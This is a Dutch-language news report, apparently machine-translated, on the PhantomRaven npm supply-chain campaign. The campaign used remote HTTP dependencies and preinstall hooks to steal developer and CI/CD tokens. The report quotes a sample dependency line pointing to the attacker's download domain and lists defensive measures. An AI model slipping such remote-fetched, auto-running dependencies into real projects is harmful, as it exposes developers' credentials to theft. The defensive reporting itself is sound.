Abonneren

Blijf op de hoogte van het belangrijkste nieuws

Door op de knop Abonneren te klikken, bevestigt u dat u onze voorwaarden hebt gelezen en ermee akkoord gaat. privacybeleid En gebruiksvoorwaarden
Abonneren
Facebook Twitter Instagram LinkedIn Pinterest
Neem contact met ons op

PhantomRaven npm supply chain-aanval – 126 kwaadaardige npm-pakketten en verborgen afhankelijkheden

IT-industriedoorIT-industrie
30 oktober 2025
PhantomRaven npm supply chain-aanval – 126 kwaadaardige npm-pakketten en verborgen afhankelijkheden PhantomRaven npm supply chain-aanval – 126 kwaadaardige npm-pakketten en verborgen afhankelijkheden
De PhantomRaven-campagne maakt gebruik van verborgen npm-afhankelijkheden om malware te verspreiden.

De voortdurende PhantomRaven npm-aanvoerketenaanval is een geavanceerde malwarecampagne die zich richt op ontwikkelaars wereldwijd. Sinds augustus 2025 verspreidt de aanval zich 126 schadelijke npm-pakketten die samen meer dan eens zijn gedownload 86.000 keer. Het doel is om npm-authenticatietokens, GitHub-inloggegevens en CI/CD-geheimen, terwijl geavanceerde detectie-ontwijkingstechnieken worden gebruikt om de meeste beveiligingstools te omzeilen.

Analist bij Koi-beveiliging identificeerde de campagne in oktober 2025 toen hun gedragsmonitoringsysteem, Wings, verdachte netwerkactiviteit signaleerde tijdens de installatie van pakketten. Alle kwaadaardige pakketten deden externe verzoeken aan hetzelfde domein, wat onthulde een gecoördineerde en mondiale Operatie.

PhantomRaven NPM Supply Chain-aanval – 126 kwaadaardige NPM-pakketten en verborgen afhankelijkheden | IT-sector

Hoe de PhantomRaven NPM-aanvoerketenaanval werkt

Het onderzoek van Koi-onderzoekers bracht een duidelijke tijdlijn aan het licht. De eerste 21 pakketten werden ontdekt en verwijderd in augustus 2025. Kort daarna pasten de aanvallers hun strategie aan en slaagden ze erin om tussen september en oktober nog eens 80 pakketten te publiceren die de standaard detectiemechanismen volledig ontweken. De infrastructuur van de aanvaller vertoont een contrast tussen technologisch geavanceerde uitvoering en verrassend onzorgvuldige operationele beveiliging.

PhantomRaven NPM Supply Chain-aanval – 126 kwaadaardige NPM-pakketten en verborgen afhankelijkheden | IT-sector
Advertentie

Om de kwaadaardige code te verbergen, gebruikten de aanvallers een techniek met externe dynamische afhankelijkheden. Hiermee kunnen afhankelijkheden worden gedefinieerd via HTTP-URL's in plaats van via het npm-register, bijvoorbeeld:
“ui-styles-pkg”: “http://packages.storeartifact.com/ui-styles-pkg.tgz”.
Wanneer een dergelijk pakket wordt geïnstalleerd, haalt npm automatisch de externe afhankelijkheid op zonder enige beveiligingsvalidatie of transparantie.

Dit betekent dat de code die wordt geüpload naar npmjs.com kan er volkomen onschadelijk uitzien – vaak gewoon een "hello world"-script – terwijl de daadwerkelijke schadelijke payload dynamisch wordt opgehaald van de server van de aanvaller bij installatie. Op deze manier omzeilen PhantomRaven-aanvallers zowel statische codeanalyse als afhankelijkheidsscans.

Verborgen afhankelijkheden en automatische uitvoering

Wanneer de onzichtbare afhankelijkheid op het systeem van het slachtoffer arriveert, wordt de schadelijke code onmiddellijk geactiveerd via het levenscyclusscript van NPM. De gemanipuleerde pakket.jsonHet bestand bevat een pre-installatiescript, "preinstall": "node index.js", dat automatisch wordt uitgevoerd zonder medeweten van de gebruiker. Het maakt niet uit hoe diep in de dependency tree het pakket zich bevindt – elke installatie van een ogenschijnlijk legitiem pakket kan de kwaadaardige uitvoering activeren.

De PhantomRaven npm-aanvoerketenaanval Hiermee wordt de inherente flexibiliteit van npm benut om kwaadaardige code in realtime te leveren. Omdat elke installatie de afhankelijkheid opnieuw van de server van de aanvaller ophaalt, kan de payload ook worden aangepast aan de doelomgeving, waardoor de aanval zeer moeilijk te bestrijden is. detecteren en stoppen.

Wat de aanvallers verzamelen

Na een succesvolle installatie verzamelt PhantomRaven systematisch e-mailadressen uit omgevingsvariabelen, gitconfigbestanden, npmrc-configuraties en auteursvelden in pakket.json. Het exfiltreert ook CI/CD-referenties, waaronder GitHub Actions-tokens, GitLab CI-sleutels, Jenkins-inloggegevens, CircleCI-tokens En npm publiceert tokens.

De malware voert vervolgens een volledige systeemprofilering uit: openbare IP-adressen, hostnamen, besturingssystemen, Node.js-versies en netwerkconfiguraties worden verzameld om onderscheid te maken tussen bedrijfsnetwerken en individuele ontwikkelaarscomputers. Deze informatie wordt gebruikt om waardevolle doelen te identificeren waar aanvallers grotere toegang kunnen krijgen of zich kunnen verspreiden.

Operationele nalatigheid en tracking

Ondanks de technische bekwaamheid is de infrastructuur tekenen van operationele nalatigheid. Verschillende e-mailaccounts werden achtereenvolgens aangemaakt via gratis diensten – van jpdtester01@hotmail.com naar jpdtester13@gmail.com – en gebruikersnaam als npmhell En npmpackagejpd komt in meerdere pakketten voor. Deze inconsistentie heeft onderzoekers in staat gesteld de campagne te herleiden tot één enkele actor, wat hoop biedt op toekomstige identificatie en vervolging.

PhantomRaven NPM Supply Chain-aanval – 126 kwaadaardige NPM-pakketten en verborgen afhankelijkheden | IT-sector

Aanbevolen beschermende maatregelen

  1. Roteer alle tokens en API-sleutels (GitHub, npm, CI/CD) die mogelijk zijn blootgesteld.
  2. Weergave pakket.jsonbestanden en identificeer eventuele afhankelijkheden die verwijzen naar HTTP-URL's. Blokkeer of verwijder deze.
  3. Implementeer SBOM-tools zoals CycloneDX of SPDX om volledig inzicht te krijgen in afhankelijkheden en versiegeschiedenis.
  4. Beperk tokenmachtigingen, gebruik kortstondige geheimen en schakel automatische rotatie in.
  5. Introduceer gedragscontrole in CI/CD-omgevingen, zoals sandbox-analyse van nieuwe pakketten voordat ze worden geïmplementeerd.
  6. Volgen OWASP Software Component Verification Standard voor het veilig verwerken van afhankelijkheden van derden.
  7. Overweeg het gebruik van privé-NPM-registers en het valideren van afhankelijkheden voordat u publiceert om de kosten te verminderen. het risico voor manipulatie in open ecosystemen.
PhantomRaven NPM Supply Chain-aanval – 126 kwaadaardige NPM-pakketten en verborgen afhankelijkheden | IT-sector

Analyse en belang voor de industrie

De toenemende omvang van de aanvallen die PhantomRaven npm-aanvoerketenaanval laat duidelijk zien hoe de afhankelijkheidsketen een van de grootste kwetsbaarheden van software is geworden. Naarmate bedrijven verder bouwen aan open source en duizenden Pakketten van derden vergroten het risico dat één enkel gecompromitteerd onderdeel grote gevolgen heeft.

Voor IT-organisaties betekent dit dat beveiliging niet langer alleen draait om netwerken of eindgebruikers, maar om de hele ontwikkelketen. Veilig codebeheer, betrouwbare afhankelijkheden en continue analyse van de toeleveringsketen worden een strategische kwestie in plaats van een technisch detail.

De campagne laat ook zien dat aanvallers zijn gaan denken als ontwikkelaars: ze misbruiken bestaande functies in tools zoals npm om malware te verspreiden op een manier die volkomen legitiem lijkt. Dit vereist een verandering in de manier waarop bedrijven hun software monitoren en verifiëren.

Voor Zweedse en Scandinavische bedrijven onderstreept het evenement het belang van het opbouwen van expertise in beveiliging van de softwaretoeleveringsketen en om te voldoen aan internationale normen. Door proactieve controle, gedeelde informatie en open samenwerkingen kan de industrie beter voorbereid zijn op de volgende grote aanval.

Deel
Deel
Vastzetten
Tweeten
Deel
Deel
IT-industriedoorIT-industrie
Gepubliceerd

Blijf op de hoogte van het belangrijkste nieuws

Door op de knop Abonneren te klikken, bevestigt u dat u onze voorwaarden hebt gelezen en ermee akkoord gaat. privacybeleid En gebruiksvoorwaarden
Promotiebanner van Hostinger
Advertentie

LEES MEER